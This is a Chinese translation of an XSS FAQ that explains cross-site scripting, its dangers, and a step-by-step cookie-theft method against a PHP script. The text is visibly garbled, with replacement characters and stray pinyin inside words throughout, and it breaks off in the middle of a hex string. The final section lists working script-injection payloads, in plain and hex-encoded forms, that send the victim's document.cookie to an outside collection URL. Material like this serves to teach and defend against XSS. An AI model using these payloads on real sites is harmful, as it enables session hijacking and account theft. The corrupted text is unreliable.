該文章簡單地介紹了XSS的基礎(chǔ)知識及其危害和預(yù)防方法����。Web開發(fā)人員的必讀。譯自 http://www.cgisecurity.com/articles/xss-faq.shtml����。
簡介
現(xiàn)在的網(wǎng)站包含大量的動態(tài)內(nèi)容以提高用戶體驗,比過去要復(fù)雜得多�����。所謂動態(tài)內(nèi)容�����,就是根據(jù)用戶環(huán)境和需要��,Web應(yīng)用程序能夠輸出相應(yīng)的內(nèi)容�����。動態(tài)站點會受到一種名為“跨站腳本攻擊”(Cross Site Scripting, 安全專家們通常將其所寫成 XSS)的威脅����,而靜態(tài)站點則完全不受其影響����。這篇FAQ將使你能更深入地理解這種威脅,并給出如何檢測并防止的建議��。
什么是跨站腳本攻擊�?
跨站腳本攻擊(也稱為XSS)指利用網(wǎng)站漏洞從用戶那里惡意盜取信息。用戶在瀏覽網(wǎng)站���、使用即時通訊軟件����、甚至在閱讀電子郵件時,通常會點擊其中的鏈接����。攻擊者通過在鏈接中插入惡意代碼,就能夠盜取用戶信息����。攻擊者通常會用十六進制(或其他編碼方式)將鏈接編碼,以免用戶懷疑它的合法性����。網(wǎng)站在接收到包含惡意代碼的請求之后會產(chǎn)成一個包含惡意代碼的頁面,而這個頁面看起來就像是那個網(wǎng)站應(yīng)當生成的合法頁面一樣��。許多流行的留言本和論壇程序允許用戶發(fā)表包含HTML和javascript的帖子���。假設(shè)用戶甲發(fā)表了一篇包含惡意腳本的帖子��,那么用戶乙在瀏覽這篇帖子時����,惡意腳本就會執(zhí)行,盜取用戶乙的session信息���。有關(guān)攻擊方法的詳細情況將在下面闡述���。
XSS和CSS是什么意思?
人們經(jīng)常將跨站腳本攻擊(Cross Site Scripting)縮寫為CSS�,但這會與層疊樣式表(Cascading Style Sheets, CSS)的縮寫混淆。因此有人將跨站腳本攻擊縮寫為XSS���。如果你聽到有人說 “我發(fā)現(xiàn)了一個XSS漏洞”���,顯然他是在說跨站腳本攻擊。
跨站腳本攻擊有什么危害����?
為了搜集用戶信息�,攻擊者通常會在有漏洞的程序中插入 JavaScript、VBScript���、 ActiveX或Flash以欺騙用戶(詳見下文)�����。一旦得手����,他們可以盜取用戶帳戶,修改用戶設(shè)置��,盜取/污染cookie��,做虛假廣告等��。每天都有大量的XSS攻擊的惡意代碼出現(xiàn)���。 Brett Moore的下面這篇文章詳細地闡述了“拒絕服務(wù)攻擊”以及用戶僅僅閱讀一篇文章就會受到的“自動攻擊”�。
能否給出幾個跨站腳本攻擊的例子�?
著名的PHPnuke程序有很多XSS漏洞。由于該程序十分流行�,因此經(jīng)常被黑客們作為XSS的攻擊對象進行檢查。下面給出了幾個已公開報告的攻擊方法�����。
能否解釋一下XSS cookie盜竊是什么意思��?
根據(jù)作為攻擊對象的Web程序,下面某些變量和插入位置可能需要進行調(diào)整�。要注意這只是攻擊方法的一個例子。在這個例子中�,我們將利用腳本“a.php”中的 “viriable”變量中的跨站腳本漏洞,通過正常請求進行攻擊��。這是跨站腳本攻擊最常見的形式�。
第一步: 鎖定目標
當你找到某個Web程序存在XSS漏洞之后,檢查一下它是否設(shè)置了cookie�。如果在該網(wǎng)站的任何地方設(shè)置了cookie,那么就可以從用戶那里盜取它���。
第二步: 測試
不同的攻擊方式將產(chǎn)生不同的XSS漏洞�,所以應(yīng)適當進行測試以使得輸出結(jié)果看起來像是正常的����。某些惡意腳本插入之后會破壞輸出的頁面。(為欺騙用戶�,輸出結(jié)果非常重要,因此攻擊者有必要調(diào)整攻擊代碼使輸出看起來正常�����。)
下一步你需要在鏈接至包含XSS漏洞的頁面的URL中插入 Javascript(或其他客戶端腳本)��。下面列出了一些經(jīng)常用于測試XSS漏洞的鏈接���。當用戶點擊這些鏈接時�����,用戶的cookie獎被發(fā)送到 www.cgisecurity.com/cgi-bin/cookie.cgi 并被顯示����。如果你看到顯示結(jié)果中包含了cookie信息��,說明可能可以劫持該用戶的賬戶���。
盜取Cookie的Javascript示例��。使用方法如下��。
ASCII用法
http://host/a.php?variable="><script>document.location=‘http://www.cgisecurity.com/cgi-bin/cookie.cgi? ‘%20+document.cookie</script>
十六進制用法
http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67
%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f
%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
注意: 每種用法都先寫為ASCII�,再寫成十六進制以便復(fù)制粘貼���。
1. "><script>document.location=‘http://www.cgisecurity.com/cgi-bin/cookie.cgi?‘ +document.cookie</script>
HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e
%6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65
%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f
%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
2. <script>document.location=‘http://www.cgisecurity.com/cgi-bin/cookie.cgi?‘ +document.cookie</script>
HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72
%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b
%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3
